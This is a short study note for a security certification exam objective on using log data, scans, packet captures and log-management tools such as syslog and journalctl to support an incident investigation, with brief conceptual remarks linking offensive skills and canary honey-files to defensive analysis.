Use data sources to support an investigation

Log data (firewall, application, endpoint, OS security, IDS/IPS, network, metadata), data sources (vulnerability scans, automated reports, dashboards, packet captures), and log management (syslog, rsyslog, journalctl, NXLog, retention, security considerations).

Exam approach: “Given a scenario” — expect to identify which data sources are relevant to an investigation, correlate events across multiple log types, and extract IOCs from packet captures or scan reports. The PBQ will likely present logs and ask you to build a timeline or identify the attack vector.

Offensive context: Packet capture analysis uses the same skills as building an interception proxy — identifying magic bytes, length fields, protocol anomalies. Understanding memory exploitation makes RAM acquisition meaningful (you know what you’re looking for in a heap dump). And deploying honey-files as canary traps gives you a specific, high-confidence investigation data source when they get tripped.